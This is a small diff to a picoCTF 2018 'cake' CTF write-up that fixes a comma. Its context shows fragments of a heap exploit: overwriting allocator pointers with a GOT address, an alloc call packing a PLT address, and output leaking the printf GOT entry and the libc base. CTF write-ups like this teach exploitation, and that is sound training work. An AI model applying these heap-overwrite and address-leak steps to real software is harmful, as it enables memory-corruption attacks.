Mithreindeir/ctf-writeups/pico-ctf2018/cake/ReadMe.md

     # Next alloc returns shop+0x8.
 Overwrite customers with shop-0x8 and counter[0] with got addr
     F = alloc(p, struct.pack("L", p_plt), 0)
 ```
-We can now inspect the first, cake, and the price variable will be the printf got entry!
+We can now inspect the first cake, and the price variable will be the printf got entry!
 ```
 pÒM is being sold for $139972221822976
 [*] libc base is at: 0x7f4dd28a1000